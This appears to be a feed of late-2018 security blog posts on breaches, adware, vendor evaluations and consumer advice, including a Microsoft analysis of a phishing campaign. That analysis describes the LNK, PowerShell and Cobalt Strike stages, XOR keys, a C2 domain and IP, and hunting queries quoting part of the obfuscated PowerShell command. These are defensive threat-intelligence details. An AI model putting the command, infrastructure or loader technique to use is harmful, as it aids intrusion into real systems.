FastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. Get started at FastTrack for Microsoft 365.

Resources

The post Step 1. Identify users: top 10 actions to secure your environment appeared first on Microsoft Secure.

Situational awareness: Real-time decision making to improve business operations

Although the term situational awareness usually pertains to the military and first responder space, it also plays a crucial role in the efficiency of public and private organizations such as large-scale businesses, government agencies, transportation and logistics, and many other industries. For business leaders, situational awareness has come to mean having real-time visibility into operations in order to understand and control the business on a day-to-day basis. This allows entire teams to understand how their … More

The post Situational awareness: Real-time decision making to improve business operations appeared first on Help Net Security.

Major flaws uncovered in leading IoT protocols

Trend Micro warned organizations to revisit their operational technology (OT) security after finding major design flaws and vulnerable implementations related to two popular machine-to-machine (M2M) protocols, Message Queuing Telemetry Transport (MQTT) and Constrained Application Protocol (CoAP). A high-level view of the interaction models of MQTT (left) and CoAP (right) The insecurity of IIoT’s data backbone Trend Micro’s new report, co-branded with Politecnico di Milano, The Fragility of Industrial IoT’s Data Backbone, highlights the growing threat … More

The post Major flaws uncovered in leading IoT protocols appeared first on Help Net Security.

80% of enterprises struggle to protect machine identities

A study conducted by Forrester Consulting examined the views of 116 IT security professionals from financial services and insurance organizations in the U.S., U.K., Germany, France and Australia. A key finding from the study reveals that eighty percent of financial services respondents who are responsible for identity and access management (IAM) believe automated communications between machines on their organizations’ networks are mostly or completely secure. Seventy-one percent of respondents believe effective protection of machine identities … More

The post 80% of enterprises struggle to protect machine identities appeared first on Help Net Security.

Hey Belfast, Imperva’s Moving Into The Neighborhood

As a local, I’m very excited to be Imperva’s first Belfast hire, in charge of spinning up the operation in our new European location.

Imperva provides best-in-class data and application security solutions on premises, in the cloud, and in hybrid environments. As we position ourselves for the next phase of our growth, it makes sense that we do this on an increasingly international level.

And what better place to take the next step, than Northern Ireland? With its growing wealth of cybersecurity talent, proximity to the U.S. and the rest of Europe and educational caliber, the move to Belfast feels very natural.

Positioned in a center of technological talent, our Belfast office will benefit from local educational institutions such as Queen’s University and Ulster University as well as the skills and professional experience of the local workforce. The investment in Northern Ireland will allow Imperva to tap into international resources and join the ranks of other cybersecurity companies expanding their presence in Belfast.

Tapping into the local job market

With the support of Invest Northern Ireland, Imperva is committed to creating 220 local jobs over a three to five year period, providing invaluable expertise and experience with Imperva’s cutting edge technologies.

Initial hiring is focused on openings in customer success — tech support, customer success management, and managed services — as well as product development — site reliability, full-stack Java engineers and security researchers — across a range of experience levels, from those who have recently graduated from relevant University courses to seasoned IT professionals.  

The Belfast location affords Imperva the opportunity to build our brand and enhance our global customers’ experience as we deliver compelling, comprehensive solutions to keep customers’ data and applications safe from cybercriminals. We’re excited to be in Belfast and are very much looking forward to playing an active role in the local technology ecosystem.

The post Hey Belfast, Imperva’s Moving Into The Neighborhood appeared first on Blog.

Why hospitals are the next frontier of cybersecurity

Hospital cybersecurity is a pressing problem with unique challenges and incalculable stakes. The healthcare industry’s accelerating adoption of sophisticated networks, connected devices and digital records has revolutionized clinical operations and patient care but has also left modern hospitals acutely vulnerable to cyber attack. Recent high-profile hacks have brought these mounting threats sharply into focus. However, despite increasing efforts and awareness, a number of technological, cultural and regulatory issues complicate healthcare cybersecurity. Security solutions built for … More

The post Why hospitals are the next frontier of cybersecurity appeared first on Help Net Security.

Hardware is on its way out as the demand for SD-WAN climbs

In today’s world applications are moving to the cloud and employee mobility is on the rise, which adds unprecedented flexibility and agility. However, this drive towards digital transformation means that businesses are faced with navigating the myriad network infrastructure and security challenges on their way to making the internet the new corporate network. Gartner projected the worldwide public cloud services market to grow 21.4 percent in 2018. This rapid proliferation of cloud services and software-as-a-service … More

The post Hardware is on its way out as the demand for SD-WAN climbs appeared first on Help Net Security.

Software Company WakeNet AB Discovered Spreading PUPs to Users

Pay-per-install, or PPI for short, is a type of software program that presents users with third-party offers while they are in the middle of another download. If a user clicks on the third-party advertisement, the software developer earns money from the download. One specific PPI program has caught the attention of our McAfee ATR team, as they recently investigated a company that has taken advantage of this software and is using deceptive techniques to spread malicious files. Meet WakeNet AB, a Swedish pay-per-install software developer that has generated a large amount of revenue – even more so than some of the most prevalent ransomware families – from spreading PUPs (potentially unwanted programs).

So, how does WakeNet AB infect users’ devices with PUPs? WakeNet sets up PPI sites to entice affiliate hackers to spread malicious files and adware. WakeNet’s most recent distribution vessel is the site FileCapital. FileCapital provides affiliate hackers with a variety of “marketing tools” such as embedded movies, landing pages, banners, and buttons. These deceptive tools are intended to coax victims into installing bundled applications that house different PUPs. Victims may install these applications because they are disguised as legitimate programs. For example, a user may think they are installing a helpful performance cleaner onto their computer. What they don’t know is that the “performance cleaner” is actually disguising other malicious files that could lead to irritating adverts and decreased computer performance.

As of now, it seems unlikely that PUP development will slow since it helps their distributors earn a considerable amount of money. With that said, it’s important now more than ever for users to be aware of the security risks involved with PUPs like the ones spread by WakeNet’s FileCapital. Check out the following tips to better protect yourself from this threat:

  • Click with caution. Be wary of pop-ups and websites asking you to click on items like movie playbacks and other software downloads. These items could infect your device with annoying adverts and malware.
  • Only download software from trusted sources. If you receive a pop-up asking you to update or install software, be vigilant. Adware and PUPs are often disguised as legitimate sites or software companies. Your best bet is to play it safe and go directly to the source when updating or installing new software.
  • Use a robust security software. Using a security solution like McAfee Total Protection could help protect your device from exposure to PUPs that have been spread by WakeNet’s FileCapital. McAfee Total Protection blocks auto-play videos on websites that decrease computer performance and warns you of risky websites and links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Software Company WakeNet AB Discovered Spreading PUPs to Users appeared first on McAfee Blogs.

Insights from the MITRE ATT&CK-based evaluation of Windows Defender ATP

In MITREs evaluation of endpoint detection and response solutions, Windows Defender Advanced Threat Protection demonstrated industry-leading optics and detection capabilities. The breadth of telemetry, the strength of threat intelligence, and the advanced, automatic detection through machine learning, heuristics, and behavior monitoring delivered comprehensive coverage of attacker techniques across the entire attack chain.

MITRE tested the ability of products to detect techniques commonly used by the targeted attack group APT3 (also known as Boron or UPS). To isolate detection capabilities, as part of the testing, all protection and prevention features were turned off. In the case of Windows Defender ATP, this meant turning off blocking capabilities like hardware-based isolation, attack surface reduction, network protection, exploit protection, controlled folder access, and next-gen antivirus. The test showed that, by itself, Windows Defender ATPs EDR component is one of the most powerful detection and investigation solutions in the market today.

Microsoft is happy to be one of the first EDR vendors to sign up for the MITRE evaluation based on the ATT&CK framework, widely regarded today as the most comprehensive catalog of attacker techniques and tactics. MITRE closely partnered with participating security vendors in designing and executing the evaluation, resulting in a very collaborative and productive testing process.
We like participating in scientific and impartial tests because we learn from them. Learning from independent tests, like listening to customers and conducting our own research, is part of our goal to make sure that Windows Defender ATP is always ahead of threats and continues to evolve.

Overall, the results of the MITRE evaluation validated our investments in continuously enriching Windows Defender ATPs capabilities to detect and expose attacker techniques. Below we highlight some of the acute attacker techniques that Windows Defender ATP effectively detected during the MITRE testing.

Deep security telemetry and comprehensive coverage

Windows Defender ATP showed exceptional capabilities for detecting attacker techniques through APT3s attack stages, registering the lowest number of misses among evaluated products. Throughout the emulated attack chain, Windows Defender ATP detected the most critical attacker techniques, including:

  • Multiple discovery techniques (detected with Suspicious sequence of exploration activities alert)
  • Multiple process injection attempts for privilege escalation, credential theft, and keylogging/screen capture
  • Rundll32.exe being used to execute malware
  • Credential dumping from LSASS
  • Persistence via Scheduled Task
  • Keylogging (both in Cobalt Strike and PS Empire)
  • Brute force login attempts
  • Accessibility features attack (abusing sticky keys)
  • Lateral movement via remote service registration

Windows Defender ATP correlates security signals across endpoints and identities. In the case of the APT3 emulation, signals from Azure Advanced Threat Protection helped expose and enrich the detection of the account discovery behavior. This validates the strategic approach behind Microsoft Threat Protection: the most comprehensive protection comes from sharing rich telemetry collected from across the entire attack chain.

Windows Defender ATPs Antimalware Scan Interface (AMSI) sensors also proved especially powerful, providing rich telemetry on the latter stages of the attack emulation, which made heavy use of malicious PowerShell scripts. This test highlighted the value of transparency: the AMSI interface enabled deep visibility into the PowerShell used in each attacker technique. Advanced machine learning-based detection capabilities in Windows Defender ATP use this visibility to expose malicious scripts.

Stopping attacks in the real world with Windows Defender ATPs unified endpoint security platform

The MITRE results represent EDR detection capabilities, which surface malicious and other anomalous activities. In actual customer environments, Windows Defender ATPs preventive capabilities, like attack surface reduction and next-gen protection capabilities, would have blocked many of the attack techniques at the onset. In addition, investigation and hunting capabilities enable security operations personnel to correlate alerts and incidents to enable holistic response actions and build wider protections.

Windows Defender ATP’s best-in-class detection capabilities, as affirmed by MITRE, is amplified across Microsoft solutions through Microsoft Threat Protection, a comprehensive, integrated protection for identities, endpoints, user data, cloud apps, and infrastructure. To run your own evaluation of how Windows Defender ATP can help protect your organization and let you detect, investigate, and respond to advanced attacks, sign up for a free Windows Defender ATP trial.

 

 

 

Windows Defender ATP team

 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

 

 

The post Insights from the MITRE ATT&CK-based evaluation of Windows Defender ATP appeared first on Microsoft Secure.

PewDiePie Fan Hacks 50,000 Printers to Keep the Channel No.1

In a recent effort to earn more subscribers for Felix Kjellberg’s channel ‘Pewdiepie’, a self-proclaimed Pewdiepie fan hacked over 50,000

PewDiePie Fan Hacks 50,000 Printers to Keep the Channel No.1 on Latest Hacking News.

Kicking off the Microsoft Graph Security Hackathon

Cybersecurity is one of the hottest sectors in tech with Gartner predicting worldwide information security spending to reach $124 billion by the end of 2019. New startups and security solutions are coming onto the market while attackers continue to find new ways to breach systems. The security solutions market has grown at a rapid pace as a result. Our customers face immense challenges in integrating all these different solutions, tools, and intelligence. Oftentimes, the number of disconnected solutions make it more difficultrather than easierto defend and recover from attacks.

We invite you to participate in the Microsoft Graph Security Hackathon for a chance to help solve this pressing challenge and win a piece of the $15,000 cash prize pool.* This online hackathon runs from December 1, 2018 to March 1, 2019 and is open to individuals, teams, and organizations globally.

The Microsoft Graph Security API offers a unified REST endpoint that makes it easy for developers to bring security solutions together to streamline security operations and improve cyber defenses and response. Tap into other Microsoft Graph APIs as well as mash up data and APIs from other sources to extend or enrich your scenarios.

Prizes

In addition to learning more about the Microsoft Graph and the security API, the hackathon offers these awesome prizes for the top projects:

  • $10,000 cash prize for the first-place solution, plus a speaking opportunity at Build 2019.
  • $3,000 cash prize for the runner up solution.
  • $2,000 cash prize for the popular choice solution, chosen via public voting.

In addition, all three winning projects, and the individuals or teams in the categories above, will be widely promoted on Microsoft blog channelsgiving you the opportunity for your creative solutions to be known to the masses. The criteria for the judging will consist of the quality of the idea, value to the enterprise, and technical implementation. You can find all the details you need on the Microsoft Graph Security Hackathon website.

Judging panel

Once the hackathon ends on March 1, 2019, judging commences immediately after by our amazing judges. Well announce the winners on or before April 1, 2019. The hackathon will be judged by a panel of Microsoft and non-Microsoft experts and influencers in the developer community and in cybersecurity, including:

  • Ann Johnson, Corporate Vice President for Cybersecurity Solutions Group for Microsoft
  • Scott Hanselman, Partner Program Manager for Microsoft
  • Mark Russinovich, CTO Azure for Microsoft
  • Rick Howard, Chief Security Officer Palo Alto Networks

We will announce more judges in the coming weeks!

Next steps

Let the #graphsecurityhackathon begin

*No purchase necessary. Open only to new and existing Devpost users who are the age of majority in their country. Game ends March 1, 2019 at 5:00 PM Eastern Time. For details, see the official rules.

The post Kicking off the Microsoft Graph Security Hackathon appeared first on Microsoft Secure.

What To Do When Your Social Media Account Gets Hacked

You log in to your favorite social media site and notice a string of posts or messages definitely not posted by you. Or, you get a message that your account password has been changed, without your knowledge. It hits you that your account has been hacked. What do you do?

This is a timely question considering that social media breaches have been on the rise. A recent survey revealed that 22%of internet users said that their online accounts have been hacked at least once, while 14% reported they were hacked more than once. And, earlier this year Facebook itself got hacked, exposing the identity information of 50 million users.

Your first move—and a crucial one—is to change your password right away, and notify your connections that your account has been hacked. This way your friends know not to click on any suspicious posts or messages that appear to be coming from you because they might contain malware or phishing attempts. But that’s not all. There may be other, hidden threats to having your social media account hacked.

The risks associated with a hacker poking around your social media have a lot to do with how much personal information you share. Does your account include personal information that could be used to steal your identity, or guess your security questions on other accounts?

These could include your date of birth, address, hometown, or names of family members and pets. Just remember, even if you keep your profile locked down with strong privacy settings, once the hacker logs in as you, everything you have posted is up for grabs.

You should also consider whether the password for the compromised account is being used on any of your other accounts, because if so, you should change those as well. A clever hacker could easily try your email address and known password on a variety of sites to see if they can log in as you, including on banking sites.

Next, you have to address the fact that your account could have been used to spread scams or malware. Hackers often infect accounts so they can profit off clicks using adware, or steal even more valuable information from you and your contacts.

You may have already seen the scam for “discount Ray-Ban” sunglasses that plagued Facebook a couple of years ago, and recently took over Instagram. This piece of malware posts phony ads to the infected user’s account, and then tags their friends in the post. Because the posts appear in a trusted friend’s feed, users are often tricked into clicking on it, which in turn compromises their own account.

So, in addition to warning your contacts not to click on suspicious messages that may have been sent using your account, you should flag the messages as scams to the social media site, and delete them from your profile page.

Finally, you’ll want to check to see if there are any new apps or games installed to your account that you didn’t download. If so, delete them since they may be another attempt to compromise your account.

Now that you know what do to after a social media account is hacked, here’s how to prevent it from happening in the first place.

How To Keep Your Social Accounts Secure

  • Don’t click on suspicious messages or links, even if they appear to be posted by someone you know.
  • Flag any scam posts or messages you encounter on social media to the website, so they can help stop the threat from spreading.
  • Use unique, complicated passwords for all your accounts.
  • If the site offers multi-factor authentication, use it, and choose the highest privacy setting available.
  • Avoid posting any identity information or personal details that might allow a hacker to guess your security questions.
  • Don’t log in to your social accounts while using public Wi-Fi, since these networks are often unsecured and your information could be stolen.
  • Always use comprehensive security software that can keep you protected from the latest threats.
  • Keep up-to-date on the latest scams and malware threats

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post What To Do When Your Social Media Account Gets Hacked appeared first on McAfee Blogs.

Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers

Reuters recently reported a hacking campaign focused on a wide range of targets across the globe. In the days leading to the Reuters publication, Microsoft researchers were closely tracking the same campaign.

Our sensors revealed that the campaign primarily targeted public sector institutions and non-governmental organizations like think tanks and research centers, but also included educational institutions and private-sector corporations in the oil and gas, chemical, and hospitality industries.

Microsoft customers using the complete Microsoft Threat Protection solution were protected from the attack. Behavior-based protections in multiple Microsoft Threat Protection components blocked malicious activities and exposed the attack at its early stages. Office 365 Advanced Threat Protection caught the malicious URLs used in emails, driving the blocking of said emails, including first-seen samples. Meanwhile, numerous alerts in Windows Defender Advanced Threat Protection exposed the attacker techniques across the attack chain.

Third-party security researchers have attributed the attack to a threat actor named APT29 or CozyBear, which largely overlaps with the activity group that Microsoft calls YTTRIUM. While our fellow analysts make a compelling case, Microsoft does not yet believe that enough evidence exists to attribute this campaign to YTTRIUM.

Regardless, due to the nature of the victims, and because the campaign features characteristics of previously observed nation-state attacks, Microsoft took the step of notifying thousands of individual recipients in hundreds of targeted organizations. As part of the Defending Democracy Program, Microsoft encourages eligible organizations to participate in Microsoft AccountGuard, a service designed to help these highly targeted customers protect themselves from cybersecurity threats.

Attack overview

The aggressive campaign began early in the morning of Wednesday, November 14. The targeting appeared to focus on organizations that are involved with policy formulation and politics or have some influence in that area.

Phishing targets in different industry verticals

Although targets are distributed across the globe, majority are located in the United States, particularly in and around Washington, D.C. Other targets are in Europe, Hong Kong, India, and Canada.

Phishing targets in different locations

The spear-phishing emails mimicked sharing notifications from OneDrive and, as noted by Reuters, impersonated the identity of individuals working at the United States Department of State. If recipients clicked a link on the spear-phishing emails, they began an exploitation chain that resulted in the implantation of a DLL backdoor that gave the attackers remote access to the recipients machines.

Attack chain

Analysis of the campaign

Delivery

The spear-phishing emails used in this attack resemble file-sharing notifications from OneDrive.

The emails contain a link to a legitimate, but compromised third-party website:

hxxps://www.jmj.com/personal/nauerthn_state_gov/TUJE7QJl[random string]

The random strings are likely used to identify distinct targeted individuals who clicked on the link. However, all observed variants of this link redirect to a specific link on the same site:

hxxps://www.jmj.com/personal/nauerthn_state_gov/VFVKRTdRSm

When users click the link, they are served a ZIP archive containing a malicious LNK file. All files in a given attack have the same file name, for example, ds7002.pdf, ds7002.zip, and ds7002.lnk.

Installation

The LNK file represents the first stage of the attack. It executes an obfuscated PowerShell command that extracts a base64-encoded payload from within the LNK file itself, starting at offset 0x5e2be and extending 16,632 bytes.

Encoded content in the LNK file

The encoded payloadanother heavily obfuscated PowerShell scriptis decoded and executed:

Decoded second script

The second script carves out two additional resources from within the .LNK file:

  • ds7002.PDF (A decoy PDF)
  • cyzfc.dat (The first stage implant)

Command and control

The first-stage DLL, cyzfc.dat, is created by the PowerShell script in the path %AppData%\Local\cyzfc.dat. It is a 64-bit DLL that exports one function: PointFunctionCall.

The PowerShell script then executes cyzfc.dat by calling rundll32.exe. After connecting to the first-stage command-and-control server at pandorasong[.]com (95.216.59.92), cyzfc.dat begins to install the final payload by taking the following actions:

  1. Allocate a ReadWrite page for the second-stage payload
  2. Extract the second-stage payload as a resource
  3. Take a header that is baked into the first payload with a size 0xEF bytes
  4. Concatenate the header with the resource, starting at byte 0x12A.
  5. De-XOR the second-stage payload with a rolling XOR (ROR1), starting from key 0xC5.

The second stage is an instance of Cobalt Strike, a commercially available penetration testing tool, which performs the following steps:

  1. Define a local named pipe with the format \\.\pipe\MSSE-<number>-server, where <number> is a random number between 0 and 9897
  2. Connecting to the pipe, write it global data with size 0x3FE00
  3. Implement a backdoor over the named pipe:
    1. Read from the pipe (maximum 0x3FE00 bytes) to an allocated buffer
    2. DeXOR the payload onto a new RW memory region, this time with a much simple XOR key: simple XORing every 4 bytes with 0x7CC2885F
    3. Turn the region to be RX
    4. Create a thread that starts running the payload’

The phase that writes to global data to the pipe actually writes a third payload. That payload is XORed with the same XORing algorithm used for reading. When decrypted, it forms a PE file with a Meterpreter header, interpreting instructions in the PE header and moving control to a reflective loader:

The third payload eventually gets loaded and connects to the command-and-control (C&C) server address that is baked-in inside configuration information in the PE file. This configuration information is de-XORed at the third payload runtime:

The configuration information itself mostly contains C&C information:

CobaltStrike is a feature-rich penetration testing tool that provides remote attackers with a wide range of capabilities, including escalating privileges, capturing user input, executing arbitrary commands through PowerShell or WMI, performing reconnaissance, communicating with C&C servers over various protocols, and downloading and installing additional malware.

End-to-end defense through Microsoft Threat Protection

Microsoft Threat Protection is a comprehensive solution for enterprise networks, protecting identities, endpoints, user data, cloud apps, and infrastructure. By integrating Microsoft services, Microsoft Threat Protection facilitates signal sharing and threat remediation across services. In this attack, Office 365 Advanced Threat Protection and Windows Defender Advanced Threat Protection quickly mitigated the threat at the onset through durable behavioral protections.

Office 365 ATP has enhanced phishing protection and coverage against new threats and polymorphic variants. Detonation systems in Office 365 ATP caught behavioral markers in links in the emails, allowing us to successfully block campaign emailsincluding first-seen samplesand protect targeted customers. Three existing behavioral-based detection algorithms quickly determined that the URLs were malicious. In addition, Office 365 ATP uses security signals from Windows Defender ATP, which had a durable behavior-based antivirus detection (Behavior:Win32/Atosev.gen!A) for the second-stage malware.If you are not already secured against advanced cyberthreat campaigns via email, begin a free Office 365 E5 trial today.

Safe Links protection in Office 365 ATP protects customers from attacks like this by analyzing unknown URLs when customers try to open them. Zero-hour Auto Purge (ZAP) actively removes emails post-delivery after they have been verified as maliciousthis is often critical in stopping attacks that weaponize embedded URLs after the emails are sent.

All of these protections and signals on the attack entry point are shared with the rest of the Microsoft Threat Protection components. Windows Defender ATP customers would see alerts related to the detection of the malicious emails by Office 365 ATP, as well the behavior-based antivirus detection.

Windows Defender ATP detects known filesystem and network artifacts associated with the attack. In addition, the actions of the LNK file are detected behaviorally. Alerts with the following titles are indicative of this attack activity:

  • Artifacts associated with an advanced threat detected
  • Network activity associated with an advanced threat detected
  • Low-reputation arbitrary code executed by signed executable
  • Suspicious LNK file opened

Network protection blocks connections to malicious domains and IP addresses. The following attack surface reduction rule also blocks malicious activities related to this attack:

  • Block executable files from running unless they meet a prevalence, age, or trusted list criteria

Through Windows Defender Security Center, security operations teams could investigate these alerts and pivot to machines, users, and the new Incidents view to trace the attack end-to-end. Automated investigation and response capabilities, threat analytics, as well as advanced hunting and new custom detections, empower security operations teams to defend their networks from this attack.To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free Windows Defender ATP trial.

The following Advanced hunting query can help security operations teams search for any related activities within the network:

//Query 1: Events involving the DLL container
let fileHash = "9858d5cb2a6614be3c48e33911bf9f7978b441bf";
find in (FileCreationEvents, ProcessCreationEvents, MiscEvents, 
RegistryEvents, NetworkCommunicationEvents, ImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where EventTime > ago(10d)

//Query 2: C&C connection
NetworkCommunicationEvents 
| where EventTime > ago(10d) 
| where RemoteUrl == "pandorasong.com" 

//Query 3: Malicious PowerShell
ProcessCreationEvents 
| where EventTime > ago(10d) 
| where ProcessCommandLine contains 
"-noni -ep bypass $zk=' JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0" 

//Query 4: Malicious domain in default browser commandline
ProcessCreationEvents 
| where EventTime > ago(10d) 
| where ProcessCommandLine contains 
"https://www.jmj.com/personal/nauerthn_state_gov" 

//Query 5: Events involving the ZIP
let fileHash = "cd92f19d3ad4ec50f6d19652af010fe07dca55e1";
find in (FileCreationEvents, ProcessCreationEvents, MiscEvents, 
RegistryEvents, NetworkCommunicationEvents, ImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where EventTime > ago(10d)

The provided queries check events from the past ten days. Change EventTime to focus on a different period.

 

 

 

Windows Defender Research team, Microsoft Threat Intelligence Center, and Office 365 ATP research team

 

 

 

Indicators of attack

Files (SHA-1)

  • ds7002.ZIP: cd92f19d3ad4ec50f6d19652af010fe07dca55e1
  • ds7002.LNK: e431261c63f94a174a1308defccc674dabbe3609
  • ds7002.PDF (decoy PDF): 8e928c550e5d44fb31ef8b6f3df2e914acd66873
  • cyzfc.dat (first-stage): 9858d5cb2a6614be3c48e33911bf9f7978b441bf

URLs

  • hxxps://www.jmj[.]com/personal/nauerthn_state_gov/VFVKRTdRSm

C&C servers

  • pandorasong[.]com (95.216.59.92) (first-stage C&C server)

 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

 

 

The post Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers appeared first on Microsoft Secure.

Fight Evolving Cybersecurity Threats With a One-Two-Three Punch

When I became vice president and general manager for IBM Security North America, the staff gave me an eye-opening look at the malicious hackers who are infiltrating everything from enterprises to government agencies to political parties. The number of new cybersecurity threats is distressing, doubling from four to eight new malware samples per second between the third and fourth quarters of 2017, according to McAfee Labs.

Yet that inside view only increased my desire to help security professionals fulfill their mission of securing organizations against cyberattacks through client and industry partnerships, advanced technologies such as artificial intelligence (AI), and incident response (IR) training on the cyber range.

Cybersecurity Is Shifting From Prevention to Remediation

Today, the volume of threats is so overwhelming that getting ahead is often unrealistic. It’s not a matter of if you’ll have a breach, it’s a matter of when — and how quickly you can detect and resolve it to minimize damage. With chief information security officers (CISOs) facing a shortage of individuals with the necessary skills to design environments and fend off threats, the focus has shifted from prevention to remediation.

To identify the areas of highest risk, just follow the money to financial institutions, retailers and government entities. Developed countries also face greater risks. The U.S. may have advanced cybersecurity technology, for example, but we also have assets that translate into greater payoffs for attackers.

Remediation comes down to visibility into your environment that allows you to notice not only external threats, but internal ones as well. In fact, internal threats create arguably the greatest vulnerabilities. Users on the inside know where the networks, databases and critical information are, and often have access to areas that are seldom monitored.

Bring the Power of Partnerships to Bear

Once you identify a breach, you’ll typically have minutes or even seconds to quarantine it and remediate the damage. You need to be able to leverage the data available and make immediate decisions. Yet frequently, the tools that security professionals use aren’t appropriately implemented, managed, monitored or tuned. In fact, 44 percent of organizations lack an overall information security strategy, according to PwC’s “The Global State of Information Security Survey 2018.”

Organizations are beginning to recognize that they cannot manage cybersecurity threats alone. You need a partner that can aggregate data from multiple clients and make that information accessible to everyone, from customers to competitors, to help prevent breaches. It’s like the railroad industry: Union Pacific, BNSF and CSX may battle for business, but they all have a vested interest in keeping the tracks safe, no matter who is using them.

Harden the Expanding Attack Surface

Along with trying to counteract increasingly sophisticated threats, enterprises must also learn how to manage the data coming from a burgeoning number of Internet of Things (IoT) devices. This data improves our lives, but the devices give attackers even more access points into the corporate environment. That’s where technology that manages a full spectrum of challenges comes into play. IBM provides an immune system for security from threat intelligence to endpoint management, with a host of solutions that harden your organization.

Even with advanced tools, analysts don’t always have enough hours in the day to keep the enterprise secure. One solution is incorporating automation and AI into the security operations center (SOC). We layer IBM Watson on top of our cybersecurity solutions to analyze data and make recommendations. And as beneficial as AI might be on day one, it delivers even more value as it learns from your data. With increasing threats and fewer resources, any automation you can implement in your cybersecurity environment helps get the work done faster and smarter.

Make Incident Response Like Muscle Memory

I mentioned malicious insider threats, but users who don’t know their behavior creates vulnerabilities are equally dangerous — even if they have no ill intent. At IBM, for example, we no longer allow the use of thumb drives since they’re an easy way to compromise an organization. We also train users from myriad organizations on how to react to threats, such as phishing scams or bogus links, so that their automatic reaction is the right reaction.

This is even more critical for incident response. We practice with clients just like you’d practice a golf swing. By developing that muscle memory, it becomes second nature to respond in the appropriate way. If you’ve had a breach in which the personally identifiable information (PII) of 100,000 customers is at risk — and the attackers are demanding payment — what do you say? What do you do? Just like fire drills, you must practice your IR plan.

Additionally, security teams need training to build discipline and processes, react appropriately and avoid making mistakes that could cost the organization millions of dollars. Response is not just a cybersecurity task, but a companywide communications effort. Everyone needs to train regularly to know how to respond.

Check out the IBM X-Force Command Cyber Tactical Operations Center (C-TOC)

Fighting Cybersecurity Threats Alongside You

IBM considers cybersecurity a strategic imperative and, as such, has invested extensive money and time in developing a best-of-breed security portfolio. I’m grateful for the opportunity to put it to work to make the cyber world a safer place. As the leader of the North American security unit, I’m committed to helping you secure your environments and achieve better business outcomes.

The post Fight Evolving Cybersecurity Threats With a One-Two-Three Punch appeared first on Security Intelligence.

Sharp rise in email and social media hacking in the UK

Police forces across the UK are coming under increasing pressure to launch criminal investigations into incidents of social media and computer hacking, according to a new report from the Parliament Street think tank. The news comes as senior Police Chiefs have warned that budget cuts and limited resources are leading to an increase in violent crime across the country. The new research paper, reveals that 14 police forces have launched a total of 2,547 investigations … More

The post Sharp rise in email and social media hacking in the UK appeared first on Help Net Security.

Half a billion Marriott guests affected by a large-scale data breach

On Friday Marriot International Inc. announced that over the last few years their Starwood properties have been exposing sensitive information of hundreds of millions of their customers. It is believed that the details of nearly 500 million Marriott customers have been accessed by cyber criminals. The leaked data include hotel visitor’s information such as name, passport number, mailing address, gender, phone number, email address, date of birth, and reservation dates. Marriot highlighted that some of the leaked information also includes payment card numbers and payment card expiration dates. The incident will remain in history as one of the largest data braches ever.

Starwood, the largest hotel chain in the world, has more than 1,200 locations across the globe and includes brands such as Westin, Sheraton, The Luxury Collection, Four Points by Sheraton, W Hotels, St. Regis, Le Méridien, Aloft. Element, Tribute Portfolio, and Design Hotels.

Marriott said that on Nov 19th, the company received a confirmation that there has been unauthorized access to Starwood’s guest reservation database. The loophole in the database might have been active since 2014 before it was discovered in September 2018. It is currently unknown who is behind the attack and if the stolen data has ever been publicly up for sale on the Dark Web. There is no evidence showing if the attack was state-driven or has been led by money-hungry hackers.

Marriott is currently sending emails on a rolling basis to all emails found in the leaked database. They offer free one-year identity-theft protection to everyone who might have been affected by the breach. The hotel-chain is cooperating with the authorities and opened a hotline for concerned customers.

What to do if you’ve been affected?

First and foremost, you may want to consider taking advantage of the free identity-theft protection service offered by Marriott. The next thing you should do is to go through your bank statements and look for suspicious activity. If you notice something out of the ordinary, call your card issuer and discuss your concerns with them. They might be able to help you. Most banks would be happy to overnight you a card replacement.

Then you might want to keep an eye on your credit score and even consider freezing your accounts with all major credit bureaus – Equifax, Experian, and TransUnion. If you are not planning on using your credit score for purchase anytime soon, freezing your accounts is strongly suggested. This is a great way to try to prevent hackers from taking advantage of the stolen data.

If you do not have anti-virus software on all your connected devices, you must consider it. Data breaches often do not give away everything needed by fraudsters wanting to steal your identity or hard-earned cash, so they target you and look for other ways to paint the full picture. Having quality antivirus software on all your smart devices would prevent hackers from finding the missing pieces they need to gain complete control of your identity. Don’t make it easy for them and install anti-virus software on all your smart devices.

Last but not least, you may consider joining one of the multiple class-action lawsuits that started popping after the news broke on Friday. Two people from Oregon filed a lawsuit against the hotel chain hours after Marriott announced the news. Their lawsuit was followed by another one coming from a law firm based in Maryland. Expect more class-action suits to be filed in the next months.

The data breach suffered by Marriott will remain in history as one of the most significant hacks to date. While the Yahoo data breach from 2013-2014 is still topping the list – roughly 3 billion people were affected – Marriott’s breach certainly makes the top five list of largest data breaches in the world. And it may end up being the costliest breach ever as Marriott’s incident was announced months after GDPR came into play which may lead to a hefty fine for the hospitality chain.

Download your Antivirus

The post Half a billion Marriott guests affected by a large-scale data breach appeared first on Panda Security Mediacenter.

Detecting malicious behavior blended with business-justified activity

With organizations moving to the cloud and remote workers becoming the rule rather than the exception, the definition of the network is changing. Add to this the increasing use of IoT devices, encryption and engagement in shadow IT practices, and it’s easy to see why organizations have trouble keeping their network and systems secure. What’s more, attackers are changing tactics: they are relying less and less on malware and shifting their focus to stealing legitimate … More

The post Detecting malicious behavior blended with business-justified activity appeared first on Help Net Security.

Making it harder for attackers to know when a system begins to deceive a bad actor

